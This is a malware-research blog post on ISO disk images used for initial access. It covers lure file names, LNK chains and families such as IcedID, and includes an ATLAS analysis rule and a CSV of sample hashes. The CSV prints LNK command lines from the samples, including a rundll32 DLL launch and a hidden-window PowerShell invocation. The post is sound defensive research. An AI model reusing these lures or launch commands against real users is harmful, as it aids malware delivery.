Skip to main content

· 2 min read
Mert Degirmenci

Introduction

During the development of the ATLAS, even though I believed it would be something, I didn't have any clue that proves this statement. I started to write as much as possible ATLAS rules afterward, and the experience has convinced me that ATLAS helps us to store and share malware analysis details in an actionable way.

· 19 min read
Mert Degirmenci

Introduction

For so long, Microsoft Office's macro capability has been to go option for initial access by threat actors. The community has seen a great variety of samples of this technology. But things are changing by Microsoft's decisions from last year. VBA macros are blocked if the origin of the document is the internet. Although in the middle, they retrieved but then by overwhelming responses, they returned to their initial decision. On the other hand, EXCEL 4.0 macros are restricted by default.

After these game-changing decisions, threat actors started to adopt new techniques for initial access, and the community responded to this movement with an appropriate answer. The trends show us that ISO and LNK file formats are at their peak. LNK files are Windows shortcuts, and recently SentinelOne shared excellent research around them. The post inspired me to do similar research on ISO files.

ISO Format

ISO file is a disk image, a sector-by-sector copy of the optical disc data stored inside a binary file. It contains everything an optical disk does, including a file system. There are various file systems for optical disks, but for this research, I am referring to ISO 9660.

info

By the way, the story of the development of the ISO 9660 file system is perfectly suitable for a scene in American Gods, IMO. If you haven't read it yet, I highly recommend it.

After Windows 8, ISO is natively supported, and OS can directly mount it. Another option is to use an archive tool like 7-zip to inspect its content.

Research

The main goal of this research is to understand ISO trends among malware after those two significant decisions.

Initially, I filtered ISO files with 5+ positives for the past 90 days on VirusTotal. Through this search, I got more than 3k samples. Because the total amount of disk space was enormous even before the extraction, I decided to use an EC2 on AWS to take advantage of the cloud. But then the cost increased remarkably, although the machine's CPU and RAM config were very low. So I finally got back to the local. This decision forced me to filter out more aggressively.

Thus, in addition to the query above, I've picked samples with those sizes lower than 10MB. So, in the end, 304 are the total samples subject to this research.

Size of the Files

Without any doubt, I took advantage of ATLAS to easily process this dataset. At the end of the post, I shared the ATLAS rule and script for anyone who would like to continue this or do similar research.

Next Stage

The analysis shows that the next stage payload in the attack vector is likely PEEXE with %74.

Count of Masquerading Type

Masquerading File Type

I identified that plenty of samples try to lure people into believing that their contents are documents. According to the statistics, PDF is far more popular than any other format.

Count of Masquerading Type

By the way, I intentionally tried to avoid naming this part as Double File Extension as Mitre ATT&CK names. Because I count the below samples as masquerading. But they don't follow precisely Double File Extension patterns like .pdf.exe or .xls.exe:

  • RFQ_AP65425652_032421 urgente,pdf.exe
  • NDJ Heysen Shipping 18.08.2022_PDF.exe
  • TENDER BOQ-LH22000309AA2022_Pdf__.exe

The actual file type is mostly PEEXE, although different types like LNK and VBS samples also exist.

LNK

I've found that 46 samples out of 304 continue with the LNK file. Even though the LNK files' target is diverse, most run a batch file.

Count of Target

And for the samples that continue with LNK, the majority of them belong to the IcedID family. Additionally, I detected a Bumblebee sample as well.

Count of Malware Families

Language Distribution

I tried to analyze the distribution by language usage of the files extracted from ISO. There are 27 languages in total, and English is the winner with %67.6:

Count of Languages

info

There are 12 files with a DHL theme.

Conclusion

According to the research, I identified that much ISO-originated malware tries to deceive its target by mimicking a document. Especially PDF is far more prevalent in this respect. So I kindly advise taking the utmost care when dealing with files look like PDF.

Also I can confirm that ISO then LNK execution is a thing. Among those samples, IcedID is very dominant.

Another observation is that the samples I examined use urgent, financial, or procurement themes to convince them to open. They are business related. So ISO file in the corporate network should be observed closely. All the files in this research are under 10MB. So, size is not a criterion. If ISO file type is not a part of the business, it might be wise to block it completely, or to deploy detection rules.

ATLAS

Here is the ATLAS rule that I used for this research:

meta:
  name: "iso_research"
  description: "A rule for ISO research project."
  author: "r00tten"
  version: "1.0"

scripts:
    create_dir: "aW1wb3J0IG9zCmltcG9ydCB0aW1lCgpkZWYgY3JlYXRlX2RpcihwYXRoOiBzdHIpIC0+IHN0cjoKICAgIHRpbWVzdGFtcCA9IHRpbWUudGltZSgpCiAgICBiYXNlbmFtZSA9IG9zLnBhdGguYmFzZW5hbWUocGF0aCkKCiAgICBkaXJfbmFtZSA9ICJ7fV97fSIuZm9ybWF0KGJhc2VuYW1lLCBpbnQodGltZXN0YW1wKSkKICAgIG9zLm1rZGlyKGRpcl9uYW1lKQoKICAgIHJldHVybiBkaXJfbmFtZQ=="
    iso_extract: "aW1wb3J0IGlvCmltcG9ydCBvcwppbXBvcnQgc3lzCmltcG9ydCBweWNkbGliCmltcG9ydCBjb2xsZWN0aW9ucwoKZGVmIGlzb19leHRyYWN0KGRhdGE6IGJ5dGVzLCB0YXJnZXRfcGF0aDogc3RyPSIuIikgLT4gbGlzdDoKICAgIHJlc3VsdCA9IFtdCiAgICBmaWxlX2xpa2UgPSBpby5CeXRlc0lPKGRhdGEpCgogICAgaXNvID0gcHljZGxpYi5QeUNkbGliKCkKICAgIGlzby5vcGVuX2ZwKGZpbGVfbGlrZSkKCiAgICBpZiBpc28uaGFzX3VkZigpOgogICAgICAgIHBhdGhuYW1lID0gJ3VkZl9wYXRoJwogICAgZWxpZiBpc28uaGFzX3JvY2tfcmlkZ2UoKToKICAgICAgICBwYXRobmFtZSA9ICdycl9wYXRoJwogICAgZWxpZiBpc28uaGFzX2pvbGlldCgpOgogICAgICAgIHBhdGhuYW1lID0gJ2pvbGlldF9wYXRoJwogICAgZWxzZToKICAgICAgICBwYXRobmFtZSA9ICdpc29fcGF0aCcKCiAgICByb290X2VudHJ5ID0gaXNvLmdldF9yZWNvcmQoKip7cGF0aG5hbWU6ICIvIn0pCgogICAgZGlycyA9IGNvbGxlY3Rpb25zLmRlcXVlKFtyb290X2VudHJ5XSkKICAgIHdoaWxlIGRpcnM6CiAgICAgICAgZGlyX3JlY29yZCA9IGRpcnMucG9wbGVmdCgpCiAgICAgICAgaWRlbnRfdG9faGVyZSA9IGlzby5mdWxsX3BhdGhfZnJvbV9kaXJyZWNvcmQoZGlyX3JlY29yZCwKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByb2NrcmlkZ2U9cGF0aG5hbWUgPT0gJ3JyX3BhdGgnKQogICAgICAgIHJlbG5hbWUgPSBpZGVudF90b19oZXJlW2xlbigiLyIpOl0KICAgICAgICBpZiByZWxuYW1lIGFuZCByZWxuYW1lWzBdID09ICIvIjoKICAgICAgICAgICAgcmVsbmFtZSA9IHJlbG5hbWVbMTpdCiAgICAgICAgaWYgZGlyX3JlY29yZC5pc19kaXIoKToKICAgICAgICAgICAgaWYgcmVsbmFtZSAhPSAnJzoKICAgICAgICAgICAgICAgIG9zLm1ha2VkaXJzKG9zLnBhdGguam9pbih0YXJnZXRfcGF0aCwgcmVsbmFtZSkpCiAgICAgICAgICAgIGNoaWxkX2xpc3RlciA9IGlzby5saXN0X2NoaWxkcmVuKCoqe3BhdGhuYW1lOiBpZGVudF90b19oZXJlfSkKCiAgICAgICAgICAgIGZvciBjaGlsZCBpbiBjaGlsZF9saXN0ZXI6CiAgICAgICAgICAgICAgICBpZiBjaGlsZCBpcyBOb25lIG9yIGNoaWxkLmlzX2RvdCgpIG9yIGNoaWxkLmlzX2RvdGRvdCgpOgogICAgICAgICAgICAgICAgICAgIGNvbnRpbnVlCiAgICAgICAgICAgICAgICBkaXJzLmFwcGVuZChjaGlsZCkKICAgICAgICBlbHNlOgogICAgICAgICAgICBpZiBkaXJfcmVjb3JkLmlzX3N5bWxpbmsoKToKICAgICAgICAgICAgICAgIGZ1bGxwYXRoID0gb3MucGF0aC5qb2luKHRhcmdldF9wYXRoLCByZWxuYW1lKQogICAgICAgICAgICAgICAgbG9jYWxfZGlyID0gb3MucGF0aC5kaXJuYW1lKGZ1bGxwYXRoKQogICAgICAgICAgICAgICAgbG9jYWxfbGlua19uYW1lID0gb3MucGF0aC5iYXNlbmFtZShmdWxscGF0aCkKICAgICAgICAgICAgICAgIG9sZF9kaXIgPSBvcy5nZXRjd2QoKQogICAgICAgICAgICAgICAgb3MuY2hkaXIobG9jYWxfZGlyKQogICAgICAgICAgICAgICAgb3Muc3ltbGluayhkaXJfcmVjb3JkLnJvY2tfcmlkZ2Uuc3ltbGlua19wYXRoKCksIGxvY2FsX2xpbmtfbmFtZSkKICAgICAgICAgICAgICAgIG9zLmNoZGlyKG9sZF9kaXIpCiAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICBpc28uZ2V0X2ZpbGVfZnJvbV9pc28ob3MucGF0aC5qb2luKHRhcmdldF9wYXRoLCByZWxuYW1lKSwgKip7cGF0aG5hbWU6IGlkZW50X3RvX2hlcmV9KQogICAgICAgICAgICAgICAgcmVzdWx0LmFwcGVuZChvcy5wYXRoLmpvaW4ob3MuZ2V0Y3dkKCksICh0YXJnZXRfcGF0aCArIGlkZW50X3RvX2hlcmUpKSkKICAgIAogICAgaXNvLmNsb3NlKCkKCiAgICByZXR1cm4gcmVzdWx0"
    find_lnk: "aW1wb3J0IHJlCgpkZWYgZmluZF9sbmsoYXJyOiBsaXN0KSAtPiBzdHI6CiAgICByZXN1bHQgPSAiIgoKICAgIHBhdHRyID0gcmUuY29tcGlsZShyIlwubG5rJCIpCgogICAgZm9yIGkgaW4gYXJyOgogICAgICAgIGlmIHJlLnNlYXJjaChwYXR0ciwgaSk6CiAgICAgICAgICAgIHJlc3VsdCA9IGkKICAgICAgICAgICAgYnJlYWsKCiAgICByZXR1cm4gcmVzdWx0"
    get_lnk_target: "aW1wb3J0IExua1BhcnNlMwogCmRlZiBnZXRfbG5rX3RhcmdldChwYXRoOiBzdHIpIC0+IGRpY3Q6ICAKICAgIHJlc3VsdCA9IHt9CiAgICB0YXJnZXQgPSAiIgogICAgY29tbWFuZCA9ICIiCgogICAgd2l0aCBvcGVuKHBhdGgsICJyYiIpIGFzIGZpbGU6CiAgICAgICAgbG5rID0gTG5rUGFyc2UzLmxua19maWxlKGZpbGUpCiAgICAgICAgbG5rX2pzb24gPSBsbmsuZ2V0X2pzb24oKQoKICAgICAgICBpZiBsbmtfanNvbi5nZXQoInRhcmdldCIsICIiKSAhPSAiIjoKICAgICAgICAgICAgZm9yIGkgaW4gbG5rX2pzb25bInRhcmdldCJdWyJpdGVtcyJdOgogICAgICAgICAgICAgICAgaWYgaVsiY2xhc3MiXSA9PSAiUm9vdCBGb2xkZXIiIG9yXAogICAgICAgICAgICAgICAgaVsiY2xhc3MiXSA9PSAiVm9sdW1lIEl0ZW0iOgogICAgICAgICAgICAgICAgICAgIGNvbnRpbnVlCiAgICAgICAgICAgICAgICBlbGlmIGlbImNsYXNzIl0gPT0gIkZpbGUgZW50cnkiOgogICAgICAgICAgICAgICAgICAgIGlmIGlbImZsYWdzIl0gPT0gIklzIGRpcmVjdG9yeSI6CiAgICAgICAgICAgICAgICAgICAgICAgIHRhcmdldCArPSBpWyJwcmltYXJ5X25hbWUiXSArICIvIgogICAgICAgICAgICAgICAgICAgIGVsaWYgaVsiZmxhZ3MiXSA9PSAiSXMgZmlsZSI6CiAgICAgICAgICAgICAgICAgICAgICAgIHRhcmdldCArPSBpWyJwcmltYXJ5X25hbWUiXQogICAgICAgIGVsaWYgbG5rX2pzb24uZ2V0KCJleHRyYSIsICIiKSAhPSAiIjoKICAgICAgICAgICAgdGFyZ2V0ID0gbG5rX2pzb25bImV4dHJhIl1bIkVOVklST05NRU5UQUxfVkFSSUFCTEVTX0xPQ0FUSU9OX0JMT0NLIl1bInRhcmdldF9hbnNpIl0KICAgICAgICAgICAgCiAgICAgICAgY29tbWFuZCA9IGxua19qc29uWyJkYXRhIl0uZ2V0KCJjb21tYW5kX2xpbmVfYXJndW1lbnRzIiwgIiIpCiAgICAgICAgCiAgICAgICAgcmVzdWx0WyJ0YXJnZXQiXSA9IHRhcmdldAogICAgICAgIHJlc3VsdFsiY29tbWFuZCJdID0gY29tbWFuZAoKICAgIHJldHVybiByZXN1bHQ="

chain:
    s1:
        input: $param.file
        func: file_read_bin

    s1_5:
        input:
            - $scripts.create_dir
            - $param.file
        func: python_executor

    s2:
        input: 
            - $scripts.iso_extract
            - $s1
            - $s1_5
        func: python_executor

    s3:
        input:
            - $scripts.find_lnk 
            - $s2
        func: python_executor
    
    s4:
        input:
            - $scripts.get_lnk_target
            - $s3
        func: python_executor

The rule helps me to digest this dataset and to standardize the analysis process:

  • Takes the ISO file's path and reads it,
  • Creates a folder for the samples,
  • Extracts the ISO file's content,
  • Looks for a sign of the LNK file,
  • If it finds, it gets the target and command line of the LNK file.

After processing the samples, I switched to Google Sheets for data analysis. I took advantage of ATLAS's execution results to get the required data with me. Here is the script that executes the rule and then creates a CSV file with the result of the execution:

import csv

from atlas import atlas


def main():
    atl = atlas("../iso_research.atl", param={'file': '.\*'})
    result = atl.execute()
    
    with open("../iso_research.csv", "w", encoding='UTF-8', newline="") as file:
        writer = csv.writer(file)
        writer.writerow(["filename", "folder", "ISO_Content", "LNK_File", "LNK_Target", "LNK_Command"])
        for i in result:
            temp = []
            for key in i:
                try:
                    if key == "s1":
                        temp. append(i[key]['input'][0])
                    elif key == "s4":
                        temp.append(i[key]['output']['target'])
                        temp.append(i[key]['output']['command'])
                    else:
                        temp.append(i[key]['output'])
            
                except Exception as e:
                    print(e)
            
            writer.writerow(temp)


if __name__ == "__main__":
    main()
info

The ATLAS rule uses Python modules:

  • pycdlib
  • LnkParse3

CSV File

caution

I've gathered the samples from VirusTotal, and I can't state that everyone is malicious. Some might be legitimate, and I don't want to label them.

But according to the research, I can say that most of those are malware.

filenamefolderISO_ContentLNK_FileLNK_TargetLNK_Command
.\01250cb2add21beea886cad296a3accd7734eaff1ee3b4ee78881898bf569ded01250cb2add21beea886cad296a3accd7734eaff1ee3b4ee78881898bf569ded_1661938884['.\01250cb2add21beea886cad296a3accd7734eaff1ee3b4ee78881898bf569ded_1661938884/TECTRAD PROFORMA INVOICE 79462.pdf.exe']
.\01541b24ea1c721e73dcd4bf5e04e91fb80a0fe057bb7381869a37335fe9f64b01541b24ea1c721e73dcd4bf5e04e91fb80a0fe057bb7381869a37335fe9f64b_1661938884['.\01541b24ea1c721e73dcd4bf5e04e91fb80a0fe057bb7381869a37335fe9f64b_1661938884/wk38_PO_008815.vbs']
.\032b47ee8df65e17e877002a22330b07fdcad3067fa04c85402a7c4d5c3463f1032b47ee8df65e17e877002a22330b07fdcad3067fa04c85402a7c4d5c3463f1_1661938884['.\032b47ee8df65e17e877002a22330b07fdcad3067fa04c85402a7c4d5c3463f1_1661938884/ORDER-09142020.exe']
.\04a58bdfe3ed37495f899da8be2ad6de9666c5b195f4386afac655e5b052348804a58bdfe3ed37495f899da8be2ad6de9666c5b195f4386afac655e5b0523488_1661938884"['.\04a58bdfe3ed37495f899da8be2ad6de9666c5b195f4386afac655e5b0523488_1661938884/6605701.ico', '.\04a58bdfe3ed37495f899da8be2ad6de9666c5b195f4386afac655e5b0523488_1661938884/6605701.xls .exe']"
.\04cb4efa236b0ba99d1939ce96ccaef03574a03e4e9366ac553606ae0b2c2b9104cb4efa236b0ba99d1939ce96ccaef03574a03e4e9366ac553606ae0b2c2b91_1661938884
.\051e4e4358cc45eefbd383ebd1e75d1e24febab07c978d9f73bb3b739e7bd14c051e4e4358cc45eefbd383ebd1e75d1e24febab07c978d9f73bb3b739e7bd14c_1661938884['.\051e4e4358cc45eefbd383ebd1e75d1e24febab07c978d9f73bb3b739e7bd14c_1661938884/ANFRAGE AUFTRAGSBESTÄTIGUNG.exe']
.\05b9ef009d64d3ea00aabb0b45180d42b122804223e787e6ab6b8a0b042fe6e705b9ef009d64d3ea00aabb0b45180d42b122804223e787e6ab6b8a0b042fe6e7_1661938884['.\05b9ef009d64d3ea00aabb0b45180d42b122804223e787e6ab6b8a0b042fe6e7_1661938884/Receipt.exe']
.\05bcba2d512410fd53c16a5d4e21680a8c6d1878282f4f0d2badc2910e56f62d05bcba2d512410fd53c16a5d4e21680a8c6d1878282f4f0d2badc2910e56f62d_1661938884"['.\05bcba2d512410fd53c16a5d4e21680a8c6d1878282f4f0d2badc2910e56f62d_1661938884/ORDEN DE COMPRA DE A.W. Chesterton,pdf.exe']"
.\0620f8358b609f51dc511cf01064e47997feac4f3f23baf104e7d50b83c00ca60620f8358b609f51dc511cf01064e47997feac4f3f23baf104e7d50b83c00ca6_1661938884['.\0620f8358b609f51dc511cf01064e47997feac4f3f23baf104e7d50b83c00ca6_1661938884/New Order.exe;1']
.\06a37dd5ac6e44d406e863efa8450fa4a79efac6ce35c787031c56a906e8787f06a37dd5ac6e44d406e863efa8450fa4a79efac6ce35c787031c56a906e8787f_1661938884['.\06a37dd5ac6e44d406e863efa8450fa4a79efac6ce35c787031c56a906e8787f_1661938884/Revised Sales Contract.exe']
.\07436dd792bed073e74c9545d829f112f02294fb855f7fa6af6a54c6913be15907436dd792bed073e74c9545d829f112f02294fb855f7fa6af6a54c6913be159_1661938884"['.\07436dd792bed073e74c9545d829f112f02294fb855f7fa6af6a54c6913be159_1661938884/RFQ_AP65425652_032421 urgente,pdf.exe']"
.\09f5e914de294e8a18aa065032d70e21e4191f078f33ecd6eb40793455987fd609f5e914de294e8a18aa065032d70e21e4191f078f33ecd6eb40793455987fd6_1661938884['.\09f5e914de294e8a18aa065032d70e21e4191f078f33ecd6eb40793455987fd6_1661938884/Shipping Document PL&BL Draft.exe']
.\0a63a9f39e34606aca142d9a5ed264d6d0006002116a4bbbc813f208828245d30a63a9f39e34606aca142d9a5ed264d6d0006002116a4bbbc813f208828245d3_1661938884"['.\0a63a9f39e34606aca142d9a5ed264d6d0006002116a4bbbc813f208828245d3_1661938884/invoice-not-paid-date08-08-22-pdf.lnk', '.\0a63a9f39e34606aca142d9a5ed264d6d0006002116a4bbbc813f208828245d3_1661938884/at/aNewWouldSomeShe.txt', '.\0a63a9f39e34606aca142d9a5ed264d6d0006002116a4bbbc813f208828245d3_1661938884/at/but.txt', '.\0a63a9f39e34606aca142d9a5ed264d6d0006002116a4bbbc813f208828245d3_1661938884/at/forHeUseMoreWell.bat', '.\0a63a9f39e34606aca142d9a5ed264d6d0006002116a4bbbc813f208828245d3_1661938884/at/time.gif', '.\0a63a9f39e34606aca142d9a5ed264d6d0006002116a4bbbc813f208828245d3_1661938884/at/weByJustVeryVery.js']".\0a63a9f39e34606aca142d9a5ed264d6d0006002116a4bbbc813f208828245d3_1661938884/invoice-not-paid-date08-08-22-pdf.lnkat/forHeUseMoreWell.bat
.\0ba69dc19fa4e29756be1ea9daf773c2cfde59e2ac63410d6686f330ff7452eb0ba69dc19fa4e29756be1ea9daf773c2cfde59e2ac63410d6686f330ff7452eb_1661938884['.\0ba69dc19fa4e29756be1ea9daf773c2cfde59e2ac63410d6686f330ff7452eb_1661938884/BL COPY- CIF LCL SEA SHIPMENT.exe']
.\0d740a348362171814cb314a48d763e336407904a36fa278eaf390c5743ec33b0d740a348362171814cb314a48d763e336407904a36fa278eaf390c5743ec33b_1661938884"['.\0d740a348362171814cb314a48d763e336407904a36fa278eaf390c5743ec33b_1661938884/New Folder.lnk', '.\0d740a348362171814cb314a48d763e336407904a36fa278eaf390c5743ec33b_1661938884/desk.dll']".\0d740a348362171814cb314a48d763e336407904a36fa278eaf390c5743ec33b_1661938884/New Folder.lnkWindows/System32/rundll32.exe"desk.dll,aCmHmjrptS"
.\0d920a036f30c7be765d6050cd4cdebfff48dd351a683eb46607dee515a341270d920a036f30c7be765d6050cd4cdebfff48dd351a683eb46607dee515a34127_1661938884['.\0d920a036f30c7be765d6050cd4cdebfff48dd351a683eb46607dee515a34127_1661938884/FILE455544343_SMK84477464746.vbs']
.\0df4b835bc956b200096eae0441fc7b654167f491ad29a473c72c92193222b3b0df4b835bc956b200096eae0441fc7b654167f491ad29a473c72c92193222b3b_1661938884['.\0df4b835bc956b200096eae0441fc7b654167f491ad29a473c72c92193222b3b_1661938884/Bjfwelfichwhbfqwpqibblnnljlzkkvqhy.exe']
.\0e194e5ec39bddbe3eacff59128ea155add5e2f3c53fcae2487acaff51d0e61f0e194e5ec39bddbe3eacff59128ea155add5e2f3c53fcae2487acaff51d0e61f_1661938884"['.\0e194e5ec39bddbe3eacff59128ea155add5e2f3c53fcae2487acaff51d0e61f_1661938884/Documento de recibo de DHL,pdf.exe']"
.\0e1ce7b899417e82ec3888854cd4a46073c9b5fed1a6a893dbe5113fa004b7380e1ce7b899417e82ec3888854cd4a46073c9b5fed1a6a893dbe5113fa004b738_1661938884"['.\0e1ce7b899417e82ec3888854cd4a46073c9b5fed1a6a893dbe5113fa004b738_1661938884/documents.lnk', '.\0e1ce7b899417e82ec3888854cd4a46073c9b5fed1a6a893dbe5113fa004b738_1661938884/one/alsoThing.bat', '.\0e1ce7b899417e82ec3888854cd4a46073c9b5fed1a6a893dbe5113fa004b738_1661938884/one/thenTake.txt', '.\0e1ce7b899417e82ec3888854cd4a46073c9b5fed1a6a893dbe5113fa004b738_1661938884/one/weTo.js']".\0e1ce7b899417e82ec3888854cd4a46073c9b5fed1a6a893dbe5113fa004b738_1661938884/documents.lnkone/alsoThing.bat
.\0e2e19b4dc02a049c3060f45da84e5d72c5bd1264648c089de53edcc3e5ccfe10e2e19b4dc02a049c3060f45da84e5d72c5bd1264648c089de53edcc3e5ccfe1_1661938884['.\0e2e19b4dc02a049c3060f45da84e5d72c5bd1264648c089de53edcc3e5ccfe1_1661938884/NDJ Heysen Shipping 18.08.2022_PDF.exe']
.\109d336dfdaca34fda7c06fe8db5580744cd50bf04806e3d37a68ec38b6e1f29109d336dfdaca34fda7c06fe8db5580744cd50bf04806e3d37a68ec38b6e1f29_1661938884['.\109d336dfdaca34fda7c06fe8db5580744cd50bf04806e3d37a68ec38b6e1f29_1661938884/ORDER 20222.exe']
.\115d6feb7c90807180e769f1fe572b5a326c9382598efaf296d6eb72cf723e06115d6feb7c90807180e769f1fe572b5a326c9382598efaf296d6eb72cf723e06_1661938884['.\115d6feb7c90807180e769f1fe572b5a326c9382598efaf296d6eb72cf723e06_1661938884/3871_021_jpg.exe']
.\1249f07e6d88681fc29d50c0a5c11da8e0fa26288a3389a0f0aad7c9c87c2ddc1249f07e6d88681fc29d50c0a5c11da8e0fa26288a3389a0f0aad7c9c87c2ddc_1661938884['.\1249f07e6d88681fc29d50c0a5c11da8e0fa26288a3389a0f0aad7c9c87c2ddc_1661938884/Ntgroup 20207865.exe']
.\1265346359238e9ae01dadc9f8161af65721e6400c5bbe250f2799166e36a0651265346359238e9ae01dadc9f8161af65721e6400c5bbe250f2799166e36a065_1661938884['.\1265346359238e9ae01dadc9f8161af65721e6400c5bbe250f2799166e36a065_1661938884/TENDER BOQ-LH22000309AA2022_Pdf__.exe']
.\134b8bdca42b72cacb0cbc5acd33d543bd193f82b7443dfdd74fa0a0a86c5806134b8bdca42b72cacb0cbc5acd33d543bd193f82b7443dfdd74fa0a0a86c5806_1661938884['.\134b8bdca42b72cacb0cbc5acd33d543bd193f82b7443dfdd74fa0a0a86c5806_1661938884/PAYMENT.com']
.\13dbf63792772fb754146b4330c25c2cbef72aa35d678034c991b8483c7c190313dbf63792772fb754146b4330c25c2cbef72aa35d678034c991b8483c7c1903_1661938884"['.\13dbf63792772fb754146b4330c25c2cbef72aa35d678034c991b8483c7c1903_1661938884/Somora Cryptocurrency Wallet.lnk', '.\13dbf63792772fb754146b4330c25c2cbef72aa35d678034c991b8483c7c1903_1661938884/screenshot-1.png', '.\13dbf63792772fb754146b4330c25c2cbef72aa35d678034c991b8483c7c1903_1661938884/screenshot-2.png', '.\13dbf63792772fb754146b4330c25c2cbef72aa35d678034c991b8483c7c1903_1661938884/screenshot-3.png', '.\13dbf63792772fb754146b4330c25c2cbef72aa35d678034c991b8483c7c1903_1661938884/screenshot-4.png', '.\13dbf63792772fb754146b4330c25c2cbef72aa35d678034c991b8483c7c1903_1661938884/screenshot-5.png', '.\13dbf63792772fb754146b4330c25c2cbef72aa35d678034c991b8483c7c1903_1661938884/screenshot-6.png']".\13dbf63792772fb754146b4330c25c2cbef72aa35d678034c991b8483c7c1903_1661938884/Somora Cryptocurrency Wallet.lnk%windir%\system32\cmd.exe" /c powershell -windowstyle hidden $lnkpath = Get-ChildItem *.lnk ^
.\165f2a93b59626412f9806a87f9f1b1b8fb9f476183da1dd309a62e9bd188eb7165f2a93b59626412f9806a87f9f1b1b8fb9f476183da1dd309a62e9bd188eb7_1661938884['.\165f2a93b59626412f9806a87f9f1b1b8fb9f476183da1dd309a62e9bd188eb7_1661938884/Umybvakoqtcdijocoypfwpjrcqomzlsnbt.exe']
.\16c0fbe1def9b19cbbb51a77b41538ce5d2a2411ecf16dc7ca518c9b4806e39716c0fbe1def9b19cbbb51a77b41538ce5d2a2411ecf16dc7ca518c9b4806e397_1661938884"['.\16c0fbe1def9b19cbbb51a77b41538ce5d2a2411ecf16dc7ca518c9b4806e397_1661938884/A.W.Chesterton PEDIDO DE COMPRA TTY56,pdf.exe']"
.\170e11706fb6f2be904661e5f85c67fbb1b84496456e62160d9e088bc00037fa170e11706fb6f2be904661e5f85c67fbb1b84496456e62160d9e088bc00037fa_1661938884['.\170e11706fb6f2be904661e5f85c67fbb1b84496456e62160d9e088bc00037fa_1661938884/Permintaan Kutipan- Faktur 2022-08-19.exe']
.\1787374ae8bf2dce40691f220236382f54b18fa3506d5a0583f439704dece92f1787374ae8bf2dce40691f220236382f54b18fa3506d5a0583f439704dece92f_1661938884['.\1787374ae8bf2dce40691f220236382f54b18fa3506d5a0583f439704dece92f_1661938884/DETAILS AND INVOICES.exe']
.\197d3c23d1a9c9091bcf5f41bd29c6f0baff0c6847dc36302ff472ffcb0d6831197d3c23d1a9c9091bcf5f41bd29c6f0baff0c6847dc36302ff472ffcb0d6831_1661938884['.\197d3c23d1a9c9091bcf5f41bd29c6f0baff0c6847dc36302ff472ffcb0d6831_1661938884/PAYMENT COPY.exe']
.\1992a4a36f16277093133b5bb7fa1445c648815a2438b17e9d863cfe6a09bd1e1992a4a36f16277093133b5bb7fa1445c648815a2438b17e9d863cfe6a09bd1e_1661938884"['.\1992a4a36f16277093133b5bb7fa1445c648815a2438b17e9d863cfe6a09bd1e_1661938884/RFQ20211207,pdf.exe']"
.\1a174db7c0ab206c45e6cfa70ee0d72f66c4ff4693a8941d7aec74fe1017eaea1a174db7c0ab206c45e6cfa70ee0d72f66c4ff4693a8941d7aec74fe1017eaea_1661938884"['.\1a174db7c0ab206c45e6cfa70ee0d72f66c4ff4693a8941d7aec74fe1017eaea_1661938884/PEDIDO RETENA S.A. PO,pdf.exe']"
.\1c9197b30c7b2c7fa14f59484f21f3bf8a939116046bba19e29bbad3426e2dcf1c9197b30c7b2c7fa14f59484f21f3bf8a939116046bba19e29bbad3426e2dcf_1661938884"['.\1c9197b30c7b2c7fa14f59484f21f3bf8a939116046bba19e29bbad3426e2dcf_1661938884/New_Order_20221208475932AS.exe', '.\1c9197b30c7b2c7fa14f59484f21f3bf8a939116046bba19e29bbad3426e2dcf_1661938884/New_Order_doc20221208824730As.exe']"
.\1d757ac2e4fe4f80d7aa24f606f461e58bfc258706066fefca521978e5ca9ba71d757ac2e4fe4f80d7aa24f606f461e58bfc258706066fefca521978e5ca9ba7_1661938884['.\1d757ac2e4fe4f80d7aa24f606f461e58bfc258706066fefca521978e5ca9ba7_1661938884/DHL Shipment Notification.pdf.exe']
.\1e0d5ef54cf460023ca8cfcefcd96a1d6bf066f7e375a587470887e325829bcd1e0d5ef54cf460023ca8cfcefcd96a1d6bf066f7e375a587470887e325829bcd_1661938884['.\1e0d5ef54cf460023ca8cfcefcd96a1d6bf066f7e375a587470887e325829bcd_1661938884/PO 764898001.exe']
.\1f5ea9aa06f892bb07d78fc108f48583cbefd589698c3961714b4ca1740331181f5ea9aa06f892bb07d78fc108f48583cbefd589698c3961714b4ca174033118_1661938884
.\1fd0018a96a1171470f84d4d745cf11c246b785d3b60fb957c0677399d5972911fd0018a96a1171470f84d4d745cf11c246b785d3b60fb957c0677399d597291_1661938884"['.\1fd0018a96a1171470f84d4d745cf11c246b785d3b60fb957c0677399d597291_1661938884/0816-98077.lnk', '.\1fd0018a96a1171470f84d4d745cf11c246b785d3b60fb957c0677399d597291_1661938884/des.exe', '.\1fd0018a96a1171470f84d4d745cf11c246b785d3b60fb957c0677399d597291_1661938884/ofcpipc.dll']".\1fd0018a96a1171470f84d4d745cf11c246b785d3b60fb957c0677399d597291_1661938884/0816-98077.lnkWindows/System32/cmd.exe/c des.exe
.\2423ac88666eda52a72e46a44b915c56fe992c8ebec6ce76ae9df6eaf9614d9d2423ac88666eda52a72e46a44b915c56fe992c8ebec6ce76ae9df6eaf9614d9d_1661938884['.\2423ac88666eda52a72e46a44b915c56fe992c8ebec6ce76ae9df6eaf9614d9d_1661938884/cfg 30.11.19-3a4bc6.exe']
.\25c7b948bcef5fd127bb9ea50c3272f84d3ea327d6f92e90314b48b51b25707125c7b948bcef5fd127bb9ea50c3272f84d3ea327d6f92e90314b48b51b257071_1661938884['.\25c7b948bcef5fd127bb9ea50c3272f84d3ea327d6f92e90314b48b51b257071_1661938884/pphud cfg-92bc54.exe']
.\267e6bfce49b37a63afe365edc32e9b1745a4ac541fb381569d57614cfcd12d1267e6bfce49b37a63afe365edc32e9b1745a4ac541fb381569d57614cfcd12d1_1661938884['.\267e6bfce49b37a63afe365edc32e9b1745a4ac541fb381569d57614cfcd12d1_1661938884/إيصال الطلب المرفق ، 46682VK5 ، pdf.exe']
